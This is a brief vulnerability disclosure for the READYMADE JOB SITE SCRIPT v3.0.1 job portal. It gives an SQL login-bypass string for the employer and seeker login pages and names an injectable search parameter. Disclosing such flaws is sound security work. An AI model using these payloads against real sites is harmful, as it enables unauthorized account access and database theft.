################################################ #Title: READYMADE JOB SITE SCRIPT v3.0.1 - Authentication Bypass & SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.2daybiz.com #Vendor URL: http://www.2daybiz.com/content/products/40-readymade-job-site-script.php #Product: READYMADE JOB SITE SCRIPT v3.0.1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # Our Readymade PHP job site script make your own job portal website set in motion, # with our advanced PHP job site script that helps job seekers to search jobs in efficient manner. # Job portal script are developed in such way that has functionalities similar to leading job portal like Naukri.com, Monster.com, etc.., # our script offer various services for employers as well as job seekers. # # # http://localhost/eboss/employer/employer_login.php # http://localhost/eboss/seeker_login.php # # Username: 'or''=' # Password: 'or''=' # # # --SQL Injection-- # http://localhost/eboss/job_search_result.php?j_cat=11[SQL]&no_no=1 # # PoC: # http://prnt.sc/ekcek6 # # Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |